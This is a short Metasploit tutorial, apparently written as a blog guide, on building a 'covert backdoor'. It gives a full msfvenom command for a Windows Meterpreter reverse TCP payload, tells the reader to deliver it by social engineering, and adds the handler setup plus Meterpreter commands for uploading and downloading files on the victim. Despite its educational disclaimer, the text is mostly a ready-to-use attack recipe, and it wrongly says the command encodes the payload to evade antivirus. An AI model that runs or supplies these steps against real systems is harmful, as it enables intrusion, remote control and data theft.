Disclaimer: This guide is for educational purposes only. Unauthorized use of these techniques for hacking activities is illegal.
Metasploit is a crucial tool for penetration testing, providing a robust environment for creating and deploying stealthy backdoors. This guide covers payload creation and evasion techniques using Metasploit.
Lab Setup
Network Layout:
Attacker: Kali Linux
- IP: 10.0.1.50
Target: Windows 10/11
- IP: 10.0.1.20
Building a Covert Backdoor with msfvenom
Step 1: Generate the Payload
Create a reverse TCP payload and encode it to avoid antivirus detection:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.50 LPORT=4444 -f exe > /root/hidden_backdoor.exe
Step 2: Deploy the Payload
Transfer hidden_backdoor.exe
to the Windows machine using social engineering tactics.
Step 3: Initiate the Listener
Configure Metasploit to listen for the payload's connection:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.50
set LPORT 4444
exploit
Executing the backdoor on the target system will initiate a Meterpreter session.
Transferring Files with Meterpreter
With an active Meterpreter session, you can easily transfer files.
Upload Files to the Target
Ensure the Meterpreter session is active:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.50
set LPORT 4444
exploit
Transfer a file:
upload /root/malicious.exe C:\\Users\\Public\\malicious.exe
Download Files from the Target
Retrieve a file:
download C:\\Users\\Public\\data.txt /root/data.txt
Useful Meterpreter Commands
List Files:
ls
Change Directory:
cd C:\\Users\\Public
Summary
Using Metasploit, you can create and deploy backdoors, and manage files efficiently with Meterpreter. Always adhere to ethical guidelines and legal requirements during penetration testing.